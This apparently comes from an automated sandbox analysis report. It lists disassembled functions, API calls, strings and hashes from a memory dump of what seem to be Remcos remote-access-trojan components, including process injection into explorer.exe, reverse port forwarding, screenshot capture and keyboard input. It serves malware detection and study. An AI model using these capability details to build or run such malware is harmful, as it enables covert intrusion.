                                      Function 02B3A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A892
                                      • GetLastError.KERNEL32(?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A89F
                                      • __dosmaperr.LIBCMT ref: 02B3A8A6
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A8D2
                                      • GetLastError.KERNEL32(?,?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A8DC
                                      • __dosmaperr.LIBCMT ref: 02B3A8E3
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,02B01D55,?), ref: 02B3A926
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A930
                                      • __dosmaperr.LIBCMT ref: 02B3A937
                                      • _free.LIBCMT ref: 02B3A943
                                      • _free.LIBCMT ref: 02B3A94A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                      • String ID:
                                      • API String ID: 2441525078-0
                                      • Opcode ID: 9e09f86b68a53da0c47d0a51876e36228bbe7888b8a1bda705b55c76bebfe9d8
                                      • Instruction ID: 4acfce85b1f54fe5d1e3dc8d74d62b80012aa006d6c3f12c838e8d582197e4f5
                                      • Opcode Fuzzy Hash: 9e09f86b68a53da0c47d0a51876e36228bbe7888b8a1bda705b55c76bebfe9d8
                                      • Instruction Fuzzy Hash: 8331B37180420AFFDF12AFA4CC84DAE7B6DEF05364B204695FA506A190DF31D951EBA0
                                      Function 02B054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 02B054BF
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02B0556F
                                      • TranslateMessage.USER32(?), ref: 02B0557E
                                      • DispatchMessageA.USER32(?), ref: 02B05589
                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,02B74F78), ref: 02B05641
                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 02B05679
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                      • API String ID: 2956720200-749203953
                                      • Opcode ID: 5e8cec4f82d709964755841cbc6e8dbe6f2bb828339ce1ca0d544b22f3767181
                                      • Instruction ID: 2599cae86c101aca53983ac9e65e6e08e49a6d669d783796baa9584b0f974b86
                                      • Opcode Fuzzy Hash: 5e8cec4f82d709964755841cbc6e8dbe6f2bb828339ce1ca0d544b22f3767181
                                      • Instruction Fuzzy Hash: F841C432A047019BCB15FB74D8D896F7BBAAB85740F8009ACF956875D0EF348909CF91
                                      Function 02B132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 02B13417
                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 02B13425
                                      • GetFileSize.KERNEL32(?,00000000), ref: 02B13432
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 02B13452
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1345F
                                      • CloseHandle.KERNEL32(?), ref: 02B13465
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                      • String ID:
                                      • API String ID: 297527592-0
                                      • Opcode ID: f0a5c40f5eea8838f3a1853eb8d607fca3a9bce8b0b446c35ba30cf482bcf7e3
                                      • Instruction ID: bcd56e368c4bf3b6de20754b836088a45353bc54c862f1cf86baa2db291e2d62
                                      • Opcode Fuzzy Hash: f0a5c40f5eea8838f3a1853eb8d607fca3a9bce8b0b446c35ba30cf482bcf7e3
                                      • Instruction Fuzzy Hash: FB41E231648310BBD7119B25EC49F2B3BECEFC5768F544A99F644D6090EF31C500CA66
                                      Function 02B1AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB1C
                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB33
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB40
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB4F
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB60
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB63
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 32725a56a5e7eb963b990c1266ee4c321590abfa1e7ed4ec98201f69bf02e2c5
                                      • Instruction ID: 284f08e658d7303556d8df95dc0bd9e5d64d5ed391dd61da2ad764592c34c66c
                                      • Opcode Fuzzy Hash: 32725a56a5e7eb963b990c1266ee4c321590abfa1e7ed4ec98201f69bf02e2c5
                                      • Instruction Fuzzy Hash: 48112171D81628AF9722AB64DCC8EFF3B6CDF426A1B040855F909D7040DB249C06EAF1
                                      Function 02B48121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 02B48135
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B48141
                                      • _free.LIBCMT ref: 02B4814C
                                      • _free.LIBCMT ref: 02B48157
                                      • _free.LIBCMT ref: 02B48162
                                      • _free.LIBCMT ref: 02B4816D
                                      • _free.LIBCMT ref: 02B48178
                                      • _free.LIBCMT ref: 02B48183
                                      • _free.LIBCMT ref: 02B4818E
                                      • _free.LIBCMT ref: 02B4819C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: a1e00b3c150a5edb48f5b5ca5274ec95ae611e2de8b9491c3a9b97bd29a262f8
                                      • Instruction ID: 29c49a7a14b8eaa386862cec57dc2212e1766606c4c319dbf9b3a88d33045ed6
                                      • Opcode Fuzzy Hash: a1e00b3c150a5edb48f5b5ca5274ec95ae611e2de8b9491c3a9b97bd29a262f8
                                      • Instruction Fuzzy Hash: 3111637A510108AFCF02EF94C981CD97BAAFF05355B5141A5BA588F221DA31EF50AFC0
                                      Function 02B19FB4 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02B19FB9
                                      • GdiplusStartup.GDIPLUS(02B74ACC,?,00000000), ref: 02B19FEB
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02B1A077
                                      • Sleep.KERNEL32(000003E8), ref: 02B1A0FD
                                      • GetLocalTime.KERNEL32(?), ref: 02B1A105
                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 02B1A1F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                      • API String ID: 489098229-3790400642
                                      • Opcode ID: deef45df4f22c389c0716cf8f40ade19fa9cd261f26cd59d00a8639099d7e17b
                                      • Instruction ID: afae54a23823fed84ee91ceb697004685087a3e26739d4ea8dd4acba519c56b5
                                      • Opcode Fuzzy Hash: deef45df4f22c389c0716cf8f40ade19fa9cd261f26cd59d00a8639099d7e17b
                                      • Instruction Fuzzy Hash: 0F517071E112549ADB1AFBB8C894AFE7FBAAF45300F8000D9E549AB1D0EF749D45CB50
                                      Function 02B55F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,02B56FFF), ref: 02B55F27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: 83d0efee825bbcc21a85d8a1d5168d47ba8cdb0a350b1e13e4d12319f8cd10b8
                                      • Instruction ID: 69d0fbf57f090ce1096a03c45fdebdb98ec3595daa45df428310c070975c69f9
                                      • Opcode Fuzzy Hash: 83d0efee825bbcc21a85d8a1d5168d47ba8cdb0a350b1e13e4d12319f8cd10b8
                                      • Instruction Fuzzy Hash: 97518F7190062ACBCF24DF68EA8C6BDBBB8FF49315F9845C5D841AF254CB359924CB18
                                      Function 02B17495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 02B174F5
                                        • Part of subcall function 02B1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      • Sleep.KERNEL32(00000064), ref: 02B17521
                                      • DeleteFileW.KERNEL32(00000000), ref: 02B17555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreateDeleteExecuteShellSleep
                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                      • API String ID: 1462127192-2001430897
                                      • Opcode ID: 955b50652c95bbc865e8188c060b475994b2319473116d2f62991fa255f2a0cb
                                      • Instruction ID: b7727afcc04ed7211688d049d60cf1a778b9f581bb5e35ca186aa529c5c498d9
                                      • Opcode Fuzzy Hash: 955b50652c95bbc865e8188c060b475994b2319473116d2f62991fa255f2a0cb
                                      • Instruction Fuzzy Hash: CB3161719502199ADB0AFBA4DCD5EFDBF7AEF10305F4001D9E50A670E0EF605A8ACE94
                                      Function 02B073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(02B72B14,00000000,02B752D8,00003000,00000004,00000000,00000001), ref: 02B073DD
                                      • GetCurrentProcess.KERNEL32(02B72B14,00000000,00008000,?,00000000,00000001,00000000,02B07656,C:\Windows\SysWOW64\rundll32.exe), ref: 02B0749E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess
                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                      • API String ID: 2050909247-4242073005
                                      • Opcode ID: 737799e6c2bfec6b0d7faba9e0bbe5bd14d2ce069097a86bf7246f5a32c46d0e
                                      • Instruction ID: 0d2e4275519d9f67c78501e091c424beb2c46c52bcaac2d14b22e57eddcc8100
                                      • Opcode Fuzzy Hash: 737799e6c2bfec6b0d7faba9e0bbe5bd14d2ce069097a86bf7246f5a32c46d0e
                                      • Instruction Fuzzy Hash: 2A31A671A80300ABE322EF64DC89F26FBB9EB44341F140C94F95197691DB74F8189B61
                                      Function 02B1D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02B1D476
                                        • Part of subcall function 02B1D50F: RegisterClassExA.USER32(00000030), ref: 02B1D55B
                                        • Part of subcall function 02B1D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02B1D576
                                        • Part of subcall function 02B1D50F: GetLastError.KERNEL32 ref: 02B1D580
                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 02B1D4AD
                                      • lstrcpynA.KERNEL32(02B74B60,Remcos,00000080), ref: 02B1D4C7
                                      • Shell_NotifyIconA.SHELL32(00000000,02B74B48), ref: 02B1D4DD
                                      • TranslateMessage.USER32(?), ref: 02B1D4E9
                                      • DispatchMessageA.USER32(?), ref: 02B1D4F3
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02B1D500
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                      • String ID: Remcos
                                      • API String ID: 1970332568-165870891
                                      • Opcode ID: b9fac93823becb0d354ede2a20987cf50e6f6e172abf598c57b0a85cbe2f5ac7
                                      • Instruction ID: 1b89ac02f44c26c453ee31647db5c48acd8b87a54121dec55f3c4dc137394fcb
                                      • Opcode Fuzzy Hash: b9fac93823becb0d354ede2a20987cf50e6f6e172abf598c57b0a85cbe2f5ac7
                                      • Instruction Fuzzy Hash: 4A01A175C80359EBE7109FA5EC0CF9ABBBCEB81B41F004859F21187180D7B85469CB90
                                      Function 02B4CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f1acb8e1b369bd5e42b0716e5a813ebc870961d184a6aeabeef32399c2690092
                                      • Instruction ID: a28a1faae24fe393c70d90c4dff175b3537c3d330aebaa238f948690e2081dcc
                                      • Opcode Fuzzy Hash: f1acb8e1b369bd5e42b0716e5a813ebc870961d184a6aeabeef32399c2690092
                                      • Instruction Fuzzy Hash: 7FC1B070E0424AAFDB15DFA8C8C0BADBBB5EF09314F1445C9E914AB382CB35A945DB61
                                      Function 02B53D83 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(?,?), ref: 02B53E2F
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 02B53EB2
                                      • __alloca_probe_16.LIBCMT ref: 02B53EEA
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02B53F45
                                      • __alloca_probe_16.LIBCMT ref: 02B53F94
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 02B53F5C
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02B53FD8
                                      • __freea.LIBCMT ref: 02B54003
                                      • __freea.LIBCMT ref: 02B5400F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 201697637-0
                                      • Opcode ID: 04ee3a83ab3660670066a1e251061c8157c33868e9c22ee56308ebabda4b57c1
                                      • Instruction ID: d7cb32016e57d430c3da39206a63feaadb2c52f4d9561fa9f00568065d6c2495
                                      • Opcode Fuzzy Hash: 04ee3a83ab3660670066a1e251061c8157c33868e9c22ee56308ebabda4b57c1
                                      • Instruction Fuzzy Hash: 0E918071E002269BDB219E65C885BEEBBF5EF09794F1845D9EC05EF280D735D881CBA0
                                      Function 02B45179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • _memcmp.LIBVCRUNTIME ref: 02B45423
                                      • _free.LIBCMT ref: 02B45494
                                      • _free.LIBCMT ref: 02B454AD
                                      • _free.LIBCMT ref: 02B454DF
                                      • _free.LIBCMT ref: 02B454E8
                                      • _free.LIBCMT ref: 02B454F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast$_abort_memcmp
                                      • String ID: C
                                      • API String ID: 1679612858-1037565863
                                      • Opcode ID: 76a7aae4a18f36757ab03e8856c5e55abec745ab17bd3f198ce95de505059b95
                                      • Instruction ID: 98f084316e9b543be13acd820f6b7a7e3cb502b9b2b60482bab0114a01c8cae4
                                      • Opcode Fuzzy Hash: 76a7aae4a18f36757ab03e8856c5e55abec745ab17bd3f198ce95de505059b95
                                      • Instruction Fuzzy Hash: E3B13975A01619DBDB24DF18C884BADB7B5FF18304F9485EAD94AA7350EB30AE90DF40
                                      Function 02B1490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: tcp$udp
                                      • API String ID: 0-3725065008
                                      • Opcode ID: e17b7bac0a00844aa016adee309e65527397a9a36e27b0b7cfe38e11c83c517d
                                      • Instruction ID: c209574ca3c296397a0ff14f8c8b708864c858115fa5c57fcfc4e9f14994fd00
                                      • Opcode Fuzzy Hash: e17b7bac0a00844aa016adee309e65527397a9a36e27b0b7cfe38e11c83c517d
                                      • Instruction Fuzzy Hash: D1715874A083428FDB24CF14C484B2BB7F5EF88399F9548AEF89587294E774C944DB92
                                      Function 02B114F5 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Eventinet_ntoa
                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                      • API String ID: 3578746661-168337528
                                      • Opcode ID: b17a088b83c23118fe253a71e095cae54ba3ecfa2fa2c3b7bc26b9576722154e
                                      • Instruction ID: ef1a4770f6f68002563614c8aafd5b495b47432d742e1c888bea772d4765db9c
                                      • Opcode Fuzzy Hash: b17a088b83c23118fe253a71e095cae54ba3ecfa2fa2c3b7bc26b9576722154e
                                      • Instruction Fuzzy Hash: D851E771E542405BCB19FB3CC859A7E7BA6EF45380F8009D9E90A876D0EF748919CB92
                                      Function 02B17CDF Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B17F2C: __EH_prolog.LIBCMT ref: 02B17F31
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,02B660A4), ref: 02B17DDC
                                      • CloseHandle.KERNEL32(00000000), ref: 02B17DE5
                                      • DeleteFileA.KERNEL32(00000000), ref: 02B17DF4
                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 02B17DA8
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                      • String ID: <$@$Temp
                                      • API String ID: 1704390241-1032778388
                                      • Opcode ID: bcad68e9506b79647199f62bd2c61d550ab6a63a6a552474f3bdd03a43e93a17
                                      • Instruction ID: 75ce539180bdd1d06460f208c349091a91ef0eedd24006b493159ff7561ee21b
                                      • Opcode Fuzzy Hash: bcad68e9506b79647199f62bd2c61d550ab6a63a6a552474f3bdd03a43e93a17
                                      • Instruction Fuzzy Hash: 9F4160319502099BDB19FB64DC95AFEBB7AAF10350F8041E8E50A674D0EF741A99CF90
                                      Function 02B07963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,02B74EE0,02B65FA4,?,00000000,02B07FFC,00000000), ref: 02B079C5
                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,02B07FFC,00000000,?,?,0000000A,00000000), ref: 02B07A0D
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • CloseHandle.KERNEL32(00000000,?,00000000,02B07FFC,00000000,?,?,0000000A,00000000), ref: 02B07A4D
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 02B07A6A
                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 02B07A95
                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 02B07AA5
                                        • Part of subcall function 02B04B96: WaitForSingleObject.KERNEL32(?,000000FF,?,02B74EF8,02B04C49,00000000,?,?,?,02B74EF8,?), ref: 02B04BA5
                                        • Part of subcall function 02B04B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B0548B), ref: 02B04BC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                      • String ID: .part
                                      • API String ID: 1303771098-3499674018
                                      • Opcode ID: 9e7e6e170d8b238113f6f07ec25eb7643c126447c31a79c6b04b50d70fc57ee2
                                      • Instruction ID: 269b66d341fcf2830e0ddf5b53a91a3ac61b1df8b1d10f68abf26f2ac5463707
                                      • Opcode Fuzzy Hash: 9e7e6e170d8b238113f6f07ec25eb7643c126447c31a79c6b04b50d70fc57ee2
                                      • Instruction Fuzzy Hash: 14319D71508350AFC316EB24D884A9FFBADFF84354F004959B58A93180EF74EA48CF96
                                      Function 02B4AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,02B2DD01,?,?,?,02B4AE9A,00000001,00000001,?), ref: 02B4ACA3
                                      • __alloca_probe_16.LIBCMT ref: 02B4ACDB
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,02B2DD01,?,?,?,02B4AE9A,00000001,00000001,?), ref: 02B4AD29
                                      • __alloca_probe_16.LIBCMT ref: 02B4ADC0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02B4AE23
                                      • __freea.LIBCMT ref: 02B4AE30
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      • __freea.LIBCMT ref: 02B4AE39
                                      • __freea.LIBCMT ref: 02B4AE5E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                      • String ID:
                                      • API String ID: 3864826663-0
                                      • Opcode ID: dc6bb84cd6d161fee79fe9b336cb837dc86615969246c1b7977b90c68816e013
                                      • Instruction ID: 96a1cb2bf6d4864aaddb1c4227a7b895ee067491da52d14c9aa59e4f991d7dd4
                                      • Opcode Fuzzy Hash: dc6bb84cd6d161fee79fe9b336cb837dc86615969246c1b7977b90c68816e013
                                      • Instruction Fuzzy Hash: 7551D472680216AFDB259E64CCD0EBB77AAEB44754F2546A8FC14D7180EF34DC50EB90
                                      Function 02B19993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02B199CC
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02B199ED
